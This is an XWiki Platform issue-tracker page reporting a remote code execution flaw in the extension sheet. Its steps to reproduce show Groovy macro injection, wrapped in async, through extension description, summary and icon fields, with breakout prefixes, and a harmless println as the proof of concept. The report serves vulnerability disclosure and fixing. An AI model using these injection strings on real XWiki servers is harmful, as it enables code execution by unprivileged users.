Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-21890

Remote code execution through the extension sheet

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce.

      1. As a user without script or programming right, in any extension page, add the following content in the description

      {{async}}{{groovy}}println("Hello from Description"){{/groovy}}{{/async}}

      2. Save or preview the extension page.

      Expected result:

      An error is displayed as the user doesn't have script or programming right.

      Actual result:

      "Hello from Description" is displayed without any error.

      The same vulnerability also exists in the installation instructions. The summary is vulnerable with

      }}}{{async}}{{groovy}}println("Hello from Summary"){{/groovy}}{{/async}}
      

      and the icon with

      ]]{{async}}{{groovy}}println("Hello from Icon"){{/groovy}}{{/async}}

      . Other fields might be vulnerable as well.

      Attachments

        Issue Links

          Activity

            People

              pjeanjean Pierre Jeanjean
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: